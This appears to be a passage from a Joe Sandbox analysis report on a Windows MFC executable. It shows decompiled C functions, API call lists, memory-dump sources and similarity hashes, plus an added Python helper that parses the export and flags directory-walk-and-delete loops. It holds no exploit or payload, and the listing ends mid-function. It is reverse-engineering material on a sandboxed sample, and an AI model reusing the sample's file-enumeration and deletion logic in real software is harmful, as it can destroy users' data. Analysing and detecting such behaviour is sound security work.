      • Part of subcall function 004251F0: #922.MFC42(?,004558C4,00000000,00448FA4,?), ref: 004252B4
      • Part of subcall function 004251F0: #923.MFC42(?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252C4
      • Part of subcall function 004251F0: #922.MFC42(?,00000000,?,?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252D5
      • Part of subcall function 004251F0: DeleteFileA.KERNEL32(00000000,?,00000000,?,?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252DC
      • Part of subcall function 004251F0: #800.MFC42 ref: 004252E5
      • Part of subcall function 004251F0: #800.MFC42 ref: 004252F1
      • Part of subcall function 004251F0: #800.MFC42 ref: 004252FD
      • Part of subcall function 004251F0: #800.MFC42 ref: 00425309
      • Part of subcall function 004251F0: #800.MFC42 ref: 00425315
      • Part of subcall function 004251F0: FindNextFileA.KERNEL32(00000000,?), ref: 00425322
      • Part of subcall function 004251F0: FindClose.KERNEL32(00000000), ref: 00425331
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #3092.MFC42(00000426,00000000), ref: 00419BA8
    • #6199.MFC42(00000426,00000000), ref: 00419BAF
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922FileFindH_prolog$#1168#3092#6199#924$#2514#324#536#923CloseDeleteFirstLoadNextString
    • String ID:
    • API String ID: 368402047-0
    • Opcode ID: 14fcf44b0868c2480d7591fae70aec078731fbc6b862aafbea06c83e026db5e4
    • Instruction ID: 3d96fd1fcb167d6c4e3b0fec669bcb9cfe4fc85f12ecb2bdae11af778ce44df2
    • Opcode Fuzzy Hash: 14fcf44b0868c2480d7591fae70aec078731fbc6b862aafbea06c83e026db5e4
    • Instruction Fuzzy Hash: F8319071E012189BDF24EBA2E8A26EDB7B1FF49304F50005FE001A32C1DB785E44CB59
    Uniqueness

    Uniqueness Score: -1.00%
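
    The APIs list for E00419AC9 attributes the FindFirstFileA / DeleteFileA / FindNextFileA / FindClose sequence to the subcall 004251F0, and the text export of this report separates every function's address column from its C-code. The script below is an added example written for reading exports like this one; it is not Joe Sandbox tooling and not code from the sample. It re-attaches each address and each direct API reference to its statement line and then flags any function, including subcalls, whose call list contains a find-first / delete / find-next triple. It assumes the layout seen on this page: one address line per statement line, in the same order, with 0x00000000 standing in for lines the decompiler synthesised. The sample block is a constructed cut-down copy of the E00419AC9 block.

```python
"""Re-attach a Joe Sandbox "C-Code" listing to its detached address column and
its "APIs" references, then flag directory-walk-and-delete call patterns.

Added example for this report, not Joe Sandbox tooling.  It assumes the layout
the text export uses: one address line per statement line, in the same order,
with 0x00000000 standing in for lines the decompiler synthesised.
"""
import re
from typing import Dict, List, Optional, Tuple

ADDR_RE = re.compile(r"^\s*(0x[0-9a-fA-F]{8})\s*$")
# Matches "• #2514.MFC42 ref: 00419B05" as well as
# "  • Part of subcall function 004251F0: DeleteFileA.KERNEL32(00000000,?), ref: 004252DC"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^(\s]+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Call names that, together, make a "walk a directory and delete" loop.
WIPE_TRIPLE = ("FindFirstFile", "DeleteFile", "FindNextFile")

# Constructed sample: a cut-down E00419AC9 block in the export's own layout.
SAMPLE = """\
C-Code - Quality: 85%
    E00419AC9(intOrPtr __ecx, void* __eflags) {
        void* _t34;
        void* _t35;

        E0043E4E0(0x4411a7, _t76);
        L0043DE7A();
        if(_t34 == _t47) {
            E004251F0();
        }
        return _t35;
    }

    0x00419ace
    0x00419b05
    0x00419b0c
    0x00419b2a
    0x00419b2a
    0x00419bdd

APIs
• __EH_prolog.LIBCMT ref: 00419ACE
• #2514.MFC42 ref: 00419B05
  • Part of subcall function 004251F0: FindFirstFileA.KERNEL32(?,?), ref: 0042527A
  • Part of subcall function 004251F0: DeleteFileA.KERNEL32(00000000,?), ref: 004252DC
  • Part of subcall function 004251F0: FindNextFileA.KERNEL32(00000000,?), ref: 00425322
  • Part of subcall function 004251F0: FindClose.KERNEL32(00000000), ref: 00425331
"""


def parse_block(text: str) -> Dict:
    """Split one function block into statements, addresses and API references."""
    lines = text.splitlines()
    sig_idx = next(i for i, l in enumerate(lines) if l.rstrip().endswith("{"))
    sig = lines[sig_idx]
    indent = sig[: len(sig) - len(sig.lstrip())]
    # The function's closing brace sits at the signature's own indentation.
    end_idx = next(i for i in range(sig_idx + 1, len(lines))
                   if lines[i].rstrip() == indent + "}")
    body = lines[sig_idx + 1:end_idx]
    # Local declarations come first; one blank line separates them from statements.
    split = next((i for i, l in enumerate(body) if not l.strip()), -1)
    addresses: List[str] = []
    apis: List[Tuple[str, str, Optional[str]]] = []   # (ref, name, subcall or None)
    for l in lines[end_idx + 1:]:
        m = ADDR_RE.match(l)
        if m:
            addresses.append(m.group(1).lower())
            continue
        m = API_RE.match(l)
        if m:
            apis.append((m.group("ref").lower(), m.group("name"), m.group("sub")))
    return {"name": sig.strip().split("(", 1)[0], "statements": body[split + 1:],
            "addresses": addresses, "apis": apis}


def annotate(block: Dict) -> List[str]:
    """Return the statements with their address and any direct API call appended."""
    stmts, addrs = block["statements"], block["addresses"]
    if len(stmts) != len(addrs):
        raise ValueError(f"{block['name']}: {len(stmts)} statements but {len(addrs)} addresses")
    direct = {ref: name for ref, name, sub in block["apis"] if sub is None}
    out = []
    for stmt, addr in zip(stmts, addrs):
        if addr == "0x00000000":            # synthesised goto/return: no real address
            out.append(stmt)
            continue
        api = direct.get(addr[2:])
        out.append(f"{stmt}  // {addr}" + (f"  {api}" if api else ""))
    return out


def file_wipe_sites(block: Dict) -> List[str]:
    """Functions (this one or a subcall) whose call list holds the wipe triple."""
    by_func: Dict[str, set] = {}
    for _ref, name, sub in block["apis"]:
        by_func.setdefault(sub or block["name"], set()).add(name.split(".")[0])
    return sorted(f for f, names in by_func.items()
                  if all(any(n.startswith(p) for n in names) for p in WIPE_TRIPLE))


if __name__ == "__main__":
    blk = parse_block(SAMPLE)
    print("\n".join(annotate(blk)))
    print("enumerate-and-delete loops in:", file_wipe_sites(blk))
```

    Run against the sample, the script prints the six statements with their addresses (the two MFC42 and __EH_prolog references land on the right lines) and reports 004251F0 as the enumerate-and-delete site. A mismatch between statement and address counts raises rather than guessing, which is the right failure mode when an export has been cut mid-function.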

    C-Code - Quality: 66% (addresses folded in from the export's per-line column; call names from the APIs list below. #4055 and #3095 are the MFC42 exports CWnd::IsDlgButtonChecked and CWnd::GetDlgItemInt, which the page lists by ordinal only; the routine copies seven check-box states and one numeric field from the dialog into the structure at this+0x64)
    			E0041997D(signed int __eax, void* __ecx) {
    				signed int _t33;
    				signed int _t34;
    				signed int _t35;
    				signed int _t36;
    				signed int _t37;
    				signed int _t38;
    				signed int _t39;
    				intOrPtr* _t42;
    
    				_push(0x421);  // 0x00419981  control ID 0x421
    				L0043DFA6();  // 0x00419986  #4055.MFC42(0x421)
    				_push(0x427);  // 0x0041998e
    				_t33 = __eax & 0xffffff00 | __eax != 0x00000000;  // 0x00419995  setne al on the call's result: normalise to 0/1 (each _tN below is eax after the preceding call)
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x126) = _t33;  // 0x00419998  byte flag at +0x126
    				L0043DFA6();  // 0x004199a0  #4055.MFC42(0x427)
    				_push(0x428);  // 0x004199a8
    				_t34 = _t33 & 0xffffff00 | _t33 != 0x00000000;  // 0x004199af
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x680) = _t34;  // 0x004199b2  flag at +0x680
    				L0043DFA6();  // 0x004199ba  #4055.MFC42(0x428)
    				_push(0x429);  // 0x004199c2
    				_t35 = _t34 & 0xffffff00 | _t34 != 0x00000000;  // 0x004199c9
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x137) = _t35;  // 0x004199cc  flag at +0x137
    				L0043DFA6();  // 0x004199d4  #4055.MFC42(0x429)
    				_push(0x42a);  // 0x004199dc
    				_t36 = _t35 & 0xffffff00 | _t35 != 0x00000000;  // 0x004199e3
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x13c) = _t36;  // 0x004199e6  flag at +0x13c
    				L0043DFA6();  // 0x004199ee  #4055.MFC42(0x42a)
    				_push(0x80f);  // 0x004199f6
    				_t37 = _t36 & 0xffffff00 | _t36 != 0x00000000;  // 0x004199fd
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x141) = _t37;  // 0x00419a00  flag at +0x141
    				L0043DFA6();  // 0x00419a08  #4055.MFC42(0x80f)
    				_t38 = _t37 & 0xffffff00 | _t37 != 0x00000000;  // 0x00419a17
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x147) = _t38;  // 0x00419a1a  flag at +0x147
    				_push(0x42b);  // 0x00419a20
    				L0043DFA6();  // 0x00419a23  #4055.MFC42(0x42b)
    				_push(0);  // 0x00419a2b  bSigned = FALSE for the GetDlgItemInt call below
    				_t39 = _t38 & 0xffffff00 | _t38 != 0x00000000;  // 0x00419a2f
    				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x1068) = _t39;  // 0x00419a32  flag at +0x1068
    				_push(0);  // 0x00419a38  lpTrans = NULL
    				_push(0x42b);  // 0x00419a3a  control 0x42b is read a second time, now as a number
    				L0043E2DC();  // 0x00419a3d  #3095.MFC42(0x42b, NULL, FALSE)
    				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x64)) + 0x67c)) = _t39 - 1;  // 0x00419a46  stores value - 1; "_t39" here is eax after #3095, the decompiler reused the name
    				_t42 =  *((intOrPtr*)(__ecx + 0x64)) + 0x67c;  // 0x00419a4f
    				if( *_t42 < 0) {  // 0x00419a57  an empty or zero field gives -1 ...
    					 *_t42 = 1;  // 0x00419a59  ... which is clamped to 1
    				}  // 0x00419a59
    				return E0040E7EB(_t42);  // 0x00419a68
    			}

    APIs
    • #4055.MFC42(00000421), ref: 00419986
    • #4055.MFC42(00000427,00000421), ref: 004199A0
    • #4055.MFC42(00000428,00000427,00000421), ref: 004199BA
    • #4055.MFC42(00000429,00000428,00000427,00000421), ref: 004199D4
    • #4055.MFC42(0000042A,00000429,00000428,00000427,00000421), ref: 004199EE
    • #4055.MFC42(0000080F,0000042A,00000429,00000428,00000427,00000421), ref: 00419A08
    • #4055.MFC42(0000042B,0000080F,0000042A,00000429,00000428,00000427,00000421), ref: 00419A23
    • #3095.MFC42(0000042B,00000000,00000000,0000042B,0000080F,0000042A,00000429,00000428,00000427,00000421), ref: 00419A3D
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sd​mp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #4055$#3095
    • String ID:
    • API String ID: 2285405428-0
    • Opcode ID: 19569031abd39eac3635899f541cf5561763a7ef0a2fc7afa1f0b5a300933956
    • Instruction ID: a60ff1a8bbf60ce52df437a49ade33641bfed4daf88a0348010dd32641ffab73
    • Opcode Fuzzy Hash: 19569031abd39eac3635899f541cf5561763a7ef0a2fc7afa1f0b5a300933956
    • Instruction Fuzzy Hash: 13210531301B418FE215AA668952B9E76966FD8B14F08007EB6868F3C3DF599E13CB19
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040CBA6(void* __ecx) {
    				intOrPtr _v276;
    				intOrPtr _v280;
    				int _v284;
    				int _v288;
    				void* _v304;
    				void* __ebp;
    				struct HWND__* _t18;
    				struct HWND__* _t19;
    				int _t20;
    				void* _t24;
    				struct tagRECT* _t34;
    
    				_t35 = __ecx;
    				L0043E192();
    				if( *((intOrPtr*)(__ecx + 0xb0)) != 0) {
    					return E0040C88B(__ecx);
    				}
    				_t34 = __ecx + 0xb4;
    				GetWindowRect( *(__ecx + 0x20), _t34);
    				_t18 = GetParent( *(_t35 + 0x20));
    				_push(_t18);
    				L0043DD9C();
    				if(_t18 != 0) {
    					_push(_t34);
    					L0043E02A();
    				}
    				_t24 = _t35 + 0x54;
    				if(_t24 != 0) {
    					_t19 =  *(_t24 + 0x20);
    				} else {
    					_t19 = 0;
    				}
    				_t20 = IsWindow(_t19);
    				if(_t20 != 0) {
    					_push(1);
    					_t20 =  &_v304;
    					_push(_t35);
    					_push(_t20);
    					L0043E198();
    					if(_t20 != 0) {
    						_v288 = 0;
    						_v284 = 0;
    						_v280 = _t34->right - _t34->left;
    						_v276 = _t34->bottom - _t34->top;
    						return SendMessageA( *(_t35 + 0x74), 0x409, 0,  &_v304);
    					}
    				}
    				return _t20;
    			}

    APIs
    • #2379.MFC42 ref: 0040CBB4
    • GetWindowRect.USER32 ref: 0040CBD8
    • GetParent.USER32(?), ref: 0040CBE1
    • #2864.MFC42(00000000), ref: 0040CBE8
    • #6880.MFC42(?,00000000), ref: 0040CBF4
    • IsWindow.USER32(?), ref: 0040CC08
    • #3812.MFC42(?,?,00000001), ref: 0040CC1E
    • SendMessageA.USER32(?,00000409,00000000,?), ref: 0040CC5C
      • Part of subcall function 0040C88B: __EH_prolog.LIBCMT ref: 0040C890
      • Part of subcall function 0040C88B: GetParent.USER32(?), ref: 0040C8AF
      • Part of subcall function 0040C88B: #2864.MFC42(00000000,?,00000000), ref: 0040C8B6
      • Part of subcall function 0040C88B: IsWindow.USER32(?), ref: 0040CA32
      • Part of subcall function 0040C88B: #3812.MFC42(?,?,00000001,?,?,00000000,?,00000000), ref: 0040CA48
      • Part of subcall function 0040C88B: SendMessageA.USER32(?,00000409,00000000,?), ref: 0040CA87
      • Part of subcall function 0040C88B: #6197.MFC42(00000000,?,?,?,?,00000004,?,?,00000000,?,00000000), ref: 0040CAA7
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$#2864#3812MessageParentSend$#2379#6197#6880H_prologRect
    • String ID:
    • API String ID: 1908715994-0
    • Opcode ID: 217a9c0f6aef29db535d6a8773f2a39317cb6fbf7bb4448d2fd5f07836a4adc4
    • Instruction ID: 5dd8543b210df8cbc6301b685941933159a3f935ca7b8e1ceec604a8764b6994
    • Opcode Fuzzy Hash: 217a9c0f6aef29db535d6a8773f2a39317cb6fbf7bb4448d2fd5f07836a4adc4
    • Instruction Fuzzy Hash: 4D117571600204DBDB249B75DD89BABB7B8FF49704F00457EB64AA2191DB74E904CB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E0040D043(void* __ecx, void* __eflags) {
    				int _t30;
    				int _t31;
    				void* _t50;
    				void* _t52;
    				signed int _t61;
    
    				E0043E4E0(0x43fe30, _t52);
    				_t50 = __ecx;
    				_t47 = __ecx + 0xdc;
    				 *((intOrPtr*)(_t52 - 0x18)) = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)(E0040D10A(__ecx + 0xdc, _t52 - 0x1c))) - 8)) != 0) {
    					L2:
    					 *((char*)(_t52 - 0xd)) = 0;
    				} else {
    					 *((char*)(_t52 - 0xd)) = 1;
    					if( *((intOrPtr*)(_t50 + 0x10c)) == 0) {
    						goto L2;
    					}
    				}
    				L0043DD36();
    				if( *((intOrPtr*)(_t52 - 0xd)) != 0) {
    					L0043DDD8();
    					_push(_t52 - 0x14);
    					 *(_t52 - 4) = 0;
    					L0043E19E();
    					_push( *((intOrPtr*)(_t52 - 0x14)));
    					L0043DDD2();
    					_t15 = _t52 - 4;
    					 *_t15 =  *(_t52 - 4) | 0xffffffff;
    					_t61 =  *_t15;
    					 *((intOrPtr*)(_t52 - 0x18)) = 1;
    					L0043DD36();
    				}
    				_t30 = E0040C33B(_t47, _t61,  *((intOrPtr*)(_t50 + 0x110)));
    				if(_t30 != 0) {
    					_t31 = 1;
    					 *(_t50 + 0xd8) = _t31;
    					_t30 = InvalidateRect( *(_t50 + 0x20), 0, _t31);
    				}
    				if( *((intOrPtr*)(_t52 - 0x18)) != 0) {
    					_push(0);
    					L0043DDD2();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
    				return _t30;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800#860$#3874#535#540H_prologInvalidateRect
    • String ID:
    • API String ID: 3569524829-0
    • Opcode ID: 6dde902e2506b9484173b80bc5f34d704e207979634fdfff0c355e8171c36650
    • Instruction ID: 35d029efc173b899b4b1fd727296ff07a82f7a86662d732049d703d180541d28
    • Opcode Fuzzy Hash: 6dde902e2506b9484173b80bc5f34d704e207979634fdfff0c355e8171c36650
    • Instruction Fuzzy Hash: 3521A471D002099FCB20EBA5C491AEFBBB4EF08308F10882FE05A721D1DB781A49CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E00403C83(signed int __ecx, void* __edi) {
    				intOrPtr _t24;
    				intOrPtr* _t25;
    				intOrPtr _t29;
    				signed int _t41;
    				intOrPtr* _t43;
    				void* _t44;
    
    				_t24 = E0043E4E0(E0043EF65, _t44);
    				_push(__ecx);
    				_t41 = __ecx;
    				if( *((intOrPtr*)(__ecx + 4)) == 0) {
    					_t25 =  *((intOrPtr*)(__ecx + 8));
    					_push(0x14);
    					if( *((intOrPtr*)(_t25 - 8)) == 0) {
    						L0043DD54();
    						_t43 = _t25;
    						 *((intOrPtr*)(_t44 - 0x10)) = _t43;
    						 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
    						if(_t43 == 0) {
    							_t41 = 0;
    						} else {
    							L0043DDDE();
    							 *(_t44 - 4) = 1;
    							L0043DDD8();
    							 *(_t43 + 0xc) =  *(_t43 + 0xc) | 0xffffffff;
    							_push(0);
    							 *(_t44 - 4) = 2;
    							 *_t43 = 0x445490;
    							 *(_t43 + 8) = 3;
    							L0043DDD2();
    						}
    						 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
    						_t25 = _t44 + 8;
    						_push(0x44aa90);
    						_push(_t25);
    						 *(_t44 + 8) = _t41;
    						L0043E528();
    					}
    					L0043DD54();
    					_t29 = _t25;
    					 *((intOrPtr*)(_t44 - 0x10)) = _t29;
    					 *(_t44 - 4) = 3;
    					if(_t29 == 0) {
    						_t24 = 0;
    					} else {
    						_t24 =  *((intOrPtr*)(_t41 + 8));
    						_push( *(_t44 + 8) & 0x000000bf | 0x00000080);
    						_push(_t24);
    						L0043DE02();
    					}
    					 *((intOrPtr*)(_t41 + 4)) = _t24;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
    				return _t24;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #823$#350#532#540#860ExceptionH_prologThrow
    • String ID:
    • API String ID: 3636128287-0
    • Opcode ID: 868783e6563bbb03d1187b08819161eaa4ce11f73b70fdfaad7a8b49b002303e
    • Instruction ID: 63433161b5d57ed2d1a44699c9fa668fd97e4b16314dc0aaa56a7f7113ed6bb4
    • Opcode Fuzzy Hash: 868783e6563bbb03d1187b08819161eaa4ce11f73b70fdfaad7a8b49b002303e
    • Instruction Fuzzy Hash: 392102719007049FEB20DF69C40279EBBE8AF48724F108A1FE066A72D1C7BC6A40CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E0041F971(void* __ecx, void* __edx, void* __eflags) {
    				struct HWND__* _t16;
    				int _t18;
    				struct HWND__* _t20;
    				void* _t33;
    				void* _t36;
    
    				E0043E4E0(0x441db8, _t36);
    				_push(__ecx);
    				_t33 = __ecx;
    				L0043DDD8();
    				_push(_t36 - 0x10);
    				_push(0x42d);
    				 *(_t36 - 4) = 0;
    				L0043E2E2();
    				E0041F818(__ecx, __edx);
    				_t16 = GetParent( *(__ecx + 0x20));
    				_push(_t16);
    				L0043DD9C();
    				_t20 = _t16;
    				if(SendMessageA( *( *((intOrPtr*)(_t33 + 0x98)) + 0x20), 0x1004, 0, 0) == 0) {
    					_push(1);
    				} else {
    					_push(3);
    				}
    				_t18 = PostMessageA( *(_t20 + 0x20), 0x470, 0, ??);
    				 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
    				return _t18;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041F976
    • #540.MFC42 ref: 0041F984
    • #3097.MFC42(0000042D,?), ref: 0041F999
      • Part of subcall function 0041F818: __EH_prolog.LIBCMT ref: 0041F81D
      • Part of subcall function 0041F818: #540.MFC42(7741B980,?,?), ref: 0041F82D
      • Part of subcall function 0041F818: #540.MFC42(7741B980,?,?), ref: 0041F83A
      • Part of subcall function 0041F818: SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0041F853
      • Part of subcall function 0041F818: ImageList_GetImageCount.COMCTL32(?,?,?), ref: 0041F865
      • Part of subcall function 0041F818: ImageList_Remove.COMCTL32(?,-00000001,?,?), ref: 0041F878
      • Part of subcall function 0041F818: #3097.MFC42(0000042D,00000419,?,?), ref: 0041F89D
      • Part of subcall function 0041F818: LoadLibraryA.KERNEL32(?,0000042D,00000419,?,?), ref: 0041F8A5
      • Part of subcall function 0041F818: EnumResourceNamesA.KERNEL32 ref: 0041F8C4
      • Part of subcall function 0041F818: FreeLibrary.KERNEL32(00000000,?,?), ref: 0041F8CB
      • Part of subcall function 0041F818: ImageList_GetImageCount.COMCTL32(?,?,?), ref: 0041F8D9
      • Part of subcall function 0041F818: #2818.MFC42(0000041D,004532C8,00000001,?,?), ref: 0041F8EF
      • Part of subcall function 0041F818: #3998.MFC42(00000003,00000000,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0041F909
      • Part of subcall function 0041F818: ImageList_GetImageCount.COMCTL32(?,00000003,00000000,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0041F917
      • Part of subcall function 0041F818: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0041F92F
      • Part of subcall function 0041F818: #6905.MFC42(00000000,00000003,00000003,?,?), ref: 0041F945
      • Part of subcall function 0041F818: #800.MFC42(?,?), ref: 0041F951
    • GetParent.USER32(?), ref: 0041F9A8
    • #2864.MFC42(00000000), ref: 0041F9AF
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0041F9C6
    • PostMessageA.USER32 ref: 0041F9DF
    • #800.MFC42 ref: 0041F9EC
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Image$List_Message$#540CountSend$#3097#800H_prologLibrary$#2818#2864#3998#6905EnumFreeLoadNamesParentPostRemoveResource
    • String ID:
    • API String ID: 1156415693-0
    • Opcode ID: 94233a04f5f0b648b3eadf33a475dac80242bdc3abc789a497fe1dbb0b639aa4
    • Instruction ID: bc08f0fc931332a31c116db0e4c8aabe0b35e21f1e1e781493ea2e7c3cfa4b20
    • Opcode Fuzzy Hash: 94233a04f5f0b648b3eadf33a475dac80242bdc3abc789a497fe1dbb0b639aa4
    • Instruction Fuzzy Hash: 3101B1B1A10210BBDB21AB66DC4AFEF7779FFC9704F10052EB152A61E1DB781941C718
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E0041A759(void* __ecx, void* __eflags) {
    				int _t19;
    				signed int _t20;
    				void* _t37;
    
    				E0043E4E0(0x4413f0, _t37);
    				_push(_t20);
    				L0043DDD8();
    				 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
    				_push(_t37 - 0x10);
    				_push(0x432);
    				L0043E2E2();
    				_t19 = strcmp( *(_t37 - 0x10),  *(E00429029(_t37 - 0x14, 0xe025)));
    				L0043DD36();
    				if((_t20 & 0xffffff00 | _t19 == 0x00000000) != 0) {
    					_push(0x4550cc);
    					_push(0x432);
    					L0043E066();
    					L0043E15C();
    				}
    				 *(_t37 - 4) =  *(_t37 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
    				return _t19;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041A75E
    • #540.MFC42 ref: 0041A76D
    • #3097.MFC42(00000432,?), ref: 0041A782
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • strcmp.MSVCRT ref: 0041A79A
    • #800.MFC42 ref: 0041A7AA
    • #3092.MFC42(00000432,004550CC), ref: 0041A7BB
    • #6199.MFC42(00000432,004550CC), ref: 0041A7C2
    • #800.MFC42 ref: 0041A7CE
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#1168#3092#3097#537#540#6199H_prologLoadStringstrcmp
    • String ID:
    • API String ID: 2713990731-0
    • Opcode ID: e4302706f348344c0111b934cf84e92528436f7596e7872fb68dae4db9b5a7eb
    • Instruction ID: 0f297a211d43a5c6c092c234e1f4e10b0e270f3ebb18d0f97577b6e52779b2a5
    • Opcode Fuzzy Hash: e4302706f348344c0111b934cf84e92528436f7596e7872fb68dae4db9b5a7eb
    • Instruction Fuzzy Hash: B2018471E12115ABDB14E7A6CD46AFEB379EF59314F40042FB022A31D1EF7C5E088628
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0040BA17(void* __ecx) {
    				char _v8;
    				void* __ebp;
    				intOrPtr* _t58;
    				intOrPtr _t59;
    				signed int _t61;
    				intOrPtr _t72;
    				intOrPtr* _t75;
    				intOrPtr _t80;
    				intOrPtr* _t84;
    
    				_push(__ecx);
    				_t84 = __ecx;
    				memset(__ecx, 0, 0x1070);
    				 *((char*)(_t84 + 0x124)) = 1;
    				 *((char*)(_t84 + 0x125)) = 1;
    				 *((char*)(_t84 + 0x127)) = 1;
    				 *((intOrPtr*)(_t84 + 0x67c)) = 1;
